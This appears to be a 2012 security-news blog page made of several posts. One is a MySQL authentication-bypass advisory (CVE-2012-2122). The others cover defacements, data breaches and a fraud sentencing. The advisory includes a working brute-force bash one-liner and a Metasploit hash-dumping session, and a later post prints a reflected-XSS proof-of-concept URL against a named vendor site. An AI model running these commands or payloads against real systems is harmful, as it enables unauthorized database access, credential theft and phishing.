Search This Blog

Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

A critical Security vulnerability in MySQL/MariaDB [CVE-2012-2122]


Security researchers reveal the existence of a serious security vulnerability in MariaDB and MySQL that enables an attacker to gain root access to the database server.Th vulnerability has been assigned to CVE-2012-2122 id;

According to Sergei Golubchik, security coordinator at MariaDB, the flaw doesn’t affect official vendor binaries, but it does expose the customers of MariaDB and MySQL who use versions such as 5.1.61, 5.2.11, 5.3.5, 5.5.22 and prior.


This flaw was rooted in an assumption that the memcmp() function would always return a value within the range -127 to 127 (signed character). On some platforms and with certain optimizations enabled, this routine can return values outside of this range, eventually causing the code that compares a hashed password to sometimes return true even when the wrong password is specified. Since the authentication protocol generates a different hash each time this comparison is done, there is a 1 in 256 chance that ANY password would be accepted for authentication.

In short, if you try to authenticate to a MySQL server affected by this flaw, there is a chance it will accept your password even if the wrong one was supplied.

The following one-liner in bash will provide access to an affected MySQL server as the root user account, without actually knowing the password.

$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
mysql>

Caveats and Defense

The first rule of securing MySQL is to not expose to the network at large in the first place. Most Linux distributions bind the MySQL daemon to localhost, preventing remote access to the service. In cases where network access must be provided, MySQL also provides host-based access controls. There are few use cases where the MySQL daemon should be intentionally exposed to the wider network and without any form of host-based access control.


If you are responsible for a MySQL server that is currently exposed to the network unnecessarily, the easiest thing to do is to modify the my.cnf file in order to restrict access to the local system. Open my.cnf with the editor of your choice, find the section labeled [mysqld] and change (or add a new line to set) the "bind-address" parameter to "127.0.0.1". Restart the MySQL service to apply this setting.

Exploit Module for PenTesters:
This evening Jonathan Cran (CTO of Pwnie Express and Metasploit contributor) committed a threaded brute-force module that abuses the authentication bypass flaw to automatically dump the password database. This ensures that even if the authentication bypass vulnerability is fixed, you should still be able to access the database using the cracked password hashes. A quick demonstration of this module is shown below using the latest Metasploit Framework GIT/SVN snapshot.


$ msfconsole

msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump

msf auxiliary(mysql_authbypass_hashdump) > set USERNAME root

msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1

msf auxiliary(mysql_authbypass_hashdump) > run



[+] 127.0.0.1:3306 The server allows logins, proceeding with bypass test

[*] 127.0.0.1:3306 Authentication bypass is 10% complete

[*] 127.0.0.1:3306 Authentication bypass is 20% complete

[*] 127.0.0.1:3306 Successfully bypassed authentication after 205 attempts

[+] 127.0.0.1:3306 Successful exploited the authentication bypass flaw, dumping hashes...

[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D

[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D

[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D

[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D

[+] 127.0.0.1:3306 Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89

[*] 127.0.0.1:3306 Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

Reference:
Rapid7

NEA.gov & Department of Public Enterprise of South Africa hacked by Zer0Pwn


The hacker known as Zer0Pwn hacked two Government sites and compromised the database belong to. The National Endowment for the Arts and Department of Public Enterprise of South Africa has been exploited via SQL Injection vulnerability.

Hacker dumped the database belong to Department of Public Enterprise of South Africa in pastebin.  The leak contains database details along with username and password details. Unfortunately, the passwords are in plain text.

The dump belong to National Endowment for the Arts website contains MySql Root username ,hashed password and host details.

UACRAO website hacked by Mr. Security

A Hacker called as Mr.Security have hacked into the official site of the Utah Association of Collegiate Registrars and Admissions Officers(UACRAO) and compromised the database.

He dumped the database in Anonpaste. The leak contains username and password details. Also the leak contains the details about the database.

"Things like this happens all day long, every day of the year. Just don't make a mess of it and secure the shit. Times of friendly hackers is over, due to the FBI and police that arrested them. The age of the new hackers, has begon." Hacker said in the leak.

WebSploit Toolkit Version 1.8 Released


Fardin OxOptimOus have released new version 1.8 of Websploit Toolkit. WebSploit Is An Open Source Project For Scan And Analysis Remote System From Vulnerability.

Web Tools Operations Added

  • PHPMyAmin Login Page Finder
  • Directory Scanner
  • Apache User Direcoty Scanner



Fixed Bugs :

  • smal keyboard control bug fixed
  • update bug fixed
  • ettercap path for backbox fixed

Download it from here:
http://sourceforge.net/projects/websploit/files/latest/download

League of Legends Online game website hacked


Hackers breached the official website of Online real-time strategy game League of Legends(from Riot Games). Riot Games issued a security warning in their official site.

According to the statement, the Hackers gained access to certain personal player data contained in certain EU West and EU Nordic & East databases .


"The most critical data accessed included email address, encrypted account password, summoner name, date of birth, and – for a small number of players – first and last name and encrypted security question and answer." The statement reads.

"Absolutely no payment or billing information of any kind was included in the breach"

After further investigation, they determined that more than half of the passwords were simple enough to be at risk of easy cracking. As a security precaution, Riot Games sent an email to all players on these platforms.  The fixed the specific security issue that hacker exploited.

eHarmony Works with Law Enforcement in Password Leak Investigation

After the database leak from eHarmony wesbite, eHarmony released an update statement saying that they are investigating the hack with the help of law enforcement authorities.


“We have also been working with law enforcement authorities in our investigation and have been in touch with one of the other companies affected as well,” eHarmony’s Blog post reads.

Similar to LinkedIn and Last.fm, eHarmony is also reluctant in providing exact details. However, they’ve taken certain steps to remove the risks posed by the incident.

While they fail to provide the exact number of impacted individuals, they highlight the fact that the “small percentage of affected accounts” have been secured by disabling their passwords.

They sent an email to all affected members and provided them with specific instructions on how to change their password and tips on how to create a robust password. The email also included a direct phone number and live online chat access to our Customer Care team so we could personally address concerns and questions.

XSS Vulnerability found in 4 Antivirus websites



A Security Researcher Ankit Sharma has discovered Cross Site scripting vulnerability in four Antivirus websites.

The official websites belong to BitDefender , AVG, Avira and Total Defense Antivirus are vulnerable to xss.



In BitDefender TrafficLight , the URL input is not filtering the XSS. The Url input allows hackers to run malicious xss code. It can results in phishing attacks.

POC:
http://trafficlight.bitdefender.com/info?url=%27;alert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29//\%27;alert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29//%22;alert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29//\%22;alert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29%3C/SCRIPT%3E



50+ Pakistani sites hacked by Silent Hacker from indishell

Hacker called as 'Silent Hacker', from Indian Hacker group 'indiShell', have hacked into more than 50 Pakistani sites that includes some high profile sites.  Hacker defaced all websites.

Sites :-

http://www.nibd.edu.pk/
http://www.aicable.org/
http://www.doodlebug.pk/
http://www.funfrooz.com/
http://www.futurelinkspk.com/
http://www.gegabyte.org/
http://www.hellojuniors.com/
http://www.iffhamulquran.com/
http://ibdlp.com/
http://ghuncha.com/
http://www.imisoftwaresolutions.com/
http://infotainment-review.com/
http://www.kamalalmimar.com/
http://kashifashion.com/
http://www.kenzaacademy.com/
http://khatm-e-nabuwwat.com/
http://www.k2international.com.pk/
http://www.literaturegala.com/
http://lsws.org/
http://www.madnimedia.com/
http://massiverentrollgrowth.com/
http://www.megaengineering.com.pk/
http://naziaz.com/
http://www.nfrmg.org/
http://www.okpankpoaro.org/
http://www.pajamajokes.com/
http://www.onlineinternetmarketer.com/
http://www.pharmaplusplus.com/
http://www.ptftennis.net/
http://www.remotefoundation.org/
http://rifintl.net/
http://www.scholarship.pk/
http://www.sciaticacuretreatment.com/
http://www.shancontrols.com/
http://www.shaziabeauty.com/
http://www.southcity.edu.pk/
http://www.sss-afg.com/
http://mpisystems.net/
http://www.tabsmedia.com/
http://www.tareef.org/
http://www.theaccomplishedprofessional.com/
http://www.themakerz.com/
http://www.timenspacemedia.com/
http://tuffit.net/
http://urdupoetryandlitraturevideos.com/
http://waqarhameed.com/
http://www.web4beautytips.com/
http://jdevelopers.net/
http://nooralamkhan.com/
http://www.zecpk.com/
http://www.jhelumtime.com/
http://freelaptopdrivers.net/
http://www.socialinnovations.pk/
http://www.doodlebug.pk/
http://www.halaalfoundation.com/

Mirrors :-

http://arab-zone.net/mirror/101603/kashifashion.com/
http://arab-zone.net/mirror/101600/imisoftwaresolutions.com/
http://arab-zone.net/mirror/101601/infotainment-review.com/
http://arab-zone.net/mirror/101599/ghuncha.com/
http://arab-zone.net/mirror/101598/ibdlp.com/
http://arab-zone.net/mirror/101596/hellojuniors.com/
http://arab-zone.net/mirror/101597/iffhamulquran.com/
http://arab-zone.net/mirror/101595/gegabyte.org/
http://arab-zone.net/mirror/101594/futurelinkspk.com/
http://arab-zone.net/mirror/101593/funfrooz.com/
http://arab-zone.net/mirror/101592/aicable.org/
http://arab-zone.net/mirror/101591/nibd.edu.pk/
http://arab-zone.net/mirror/101590/arab-zone.net/mirror/92688/halaalfoundation.com/
http://arab-zone.net/mirror/101589/halaalfoundation.com/
http://arab-zone.net/mirror/101588/socialinnovations.pk/
http://arab-zone.net/mirror/101586/jhelumtime.com/
http://arab-zone.net/mirror/101587/freelaptopdrivers.net/
http://arab-zone.net/mirror/101584/nooralamkhan.com/
http://arab-zone.net/mirror/101585/zecpk.com/
http://arab-zone.net/mirror/101583/jdevelopers.net/
http://arab-zone.net/mirror/101580/urdupoetryandlitraturevideos.com/
http://arab-zone.net/mirror/101581/waqarhameed.com/
http://arab-zone.net/mirror/101578/timenspacemedia.com/
http://arab-zone.net/mirror/101579/tuffit.net/
http://arab-zone.net/mirror/101576/theaccomplishedprofessional.com/
http://arab-zone.net/mirror/101575/tareef.org/
http://arab-zone.net/mirror/101574/tabsmedia.com/
http://arab-zone.net/mirror/101572/sss-afg.com/
http://arab-zone.net/mirror/101609/madnimedia.com/
http://arab-zone.net/mirror/101610/massiverentrollgrowth.com/
http://arab-zone.net/mirror/101606/k2international.com.pk/
http://arab-zone.net/mirror/101605/khatm-e-nabuwwat.com/
http://arab-zone.net/mirror/101604/kenzaacademy.com/
http://arab-zone.net/mirror/101607/literaturegala.com/

“t0pp8uzz” and “GM” Sentenced to Jail for Running Fraud Website

Jay Moore, known by his online moniker as t0pp8uzz, and his accomplice Damian Horne, aka GM, have been sentenced to jail after investigators accused them of running a fraud website worth an estimate of £26.9 million ($41 million or 33.2 million EUR).

According to UK’s Serious Organized Crime Agency (SOCA) Moore pleaded guilty to 12 fraud-related charges, hacking, and money laundering and received a 3-year jail sentence. Horne received 21 months after he also pleaded guilty.

The fraudsters managed to earn a lot of money after Moore (photo) launched the Freshshop, a site that intermediated the sale of stolen financial information. Horne was his right-hand man, in charge of “assisting” him.

They started timidly with selling stolen iTunes vouchers and online gaming codes on eBay, but soon enough they expanded their criminal activities to commercializing credit card details. To reach their goals, they relied on a network of bank accounts, online financial institutions and money exchange companies from abroad.

The Freshshop the cybercriminals were running looked like any other online retail store, but instead of the usual items, they were actually selling credit card data.

The valuable information was obtained not only from their own hacking operations, but also from other individuals who were looking for a way to sell the data they had stolen by breaching websites.

When authorities raided Moore’s home back in 2011, they found tens of thousands of pounds in cash, along with a number of computers connected to the Freshshop. They also found the card details of around 340,000 individuals.

He apparently gave his father around £40,000 (49,000 EUR or $61,000) to help him purchase a farm house and he bought a luxury car for himself. The fraudster told his parents that the money came from his apparently legit web design business.

Besides Moore and Horne, investigators have identified two other individuals, friends with the mastermind, who have been recruited to collect money from Western Union locations in Bristol.

Currently, SOCA is trying to identify the other cybercriminals who have been using the fraud site.

[source]

16th June 2012 null Bangalore Monthly meetup

Hi All,

We will have this month's null/OWASP/Garage4hackers/SecurityXploded
Bangalore meetup on Saturday 16th June 2012 starting at 10:00 AM. No
registrations, no fees, just come with an open mind :)

The Bangalore meet, as usual, is divided into 2 parts, the monthly
talks and the Training on Reverse Engineering. The Reverse Engineering
training will start at 12:45 PM by the SecurityXploded/
Garage4Hackers team.

Also, as discussed in the last month's meet, we will have a basic 30
minute primer on SQL Injection by Satish at 9:30 AM, before the main
talks begin at 10:00 AM. All those who would be interested to learn,
understand the basics of SQL Injection and to watch some cool demos
are requested to be present at 9:30 AM.

TALKS
1. News Bytes - Sumeer
2. JavaScript Obfuscation - Prasanna
3. SSL VPNs - Rajesh

12:45 PM onwards:
4. Practical Reversing: Part3 - Memory Forensics - Monnappa


VENUE DETAILS
Kieon, 3rd Floor, 302 Prestige Sigma,
3 Vittal Mallya Road,
Bangalore 560001
Opposite Bishop Cottons Girls School, Above Emirates Airlines office.

Map Location: http://g.co/maps/dahhv

Parking is available in the building. See you there.

Last.fm hacked and passwords leaked


Music-streaming website, Last.fm, has issued a warning to its users to change their password immediately after the password leak.

"We are currently investigating the leak of some Last.fm user passwords." The firm said in a note on its website.

" This follows recent password leaks on other sites, as well as information posted online. As a precautionary measure, we’re asking all our users to change their passwords immediately."


The site recommend users to change their password on setting page. Also ,the site said it doesn't email customers with direct links to update settings or provide passwords. Any emails that purport to be from Last.fm requesting information are likely phishing messages from scammers after your personal information.

"We’re sorry for the inconvenience around changing your password; Last.fm takes your privacy very seriously. We’ll be posting updates in our forums and via our Twitter account (@lastfm) as we get to the bottom of this."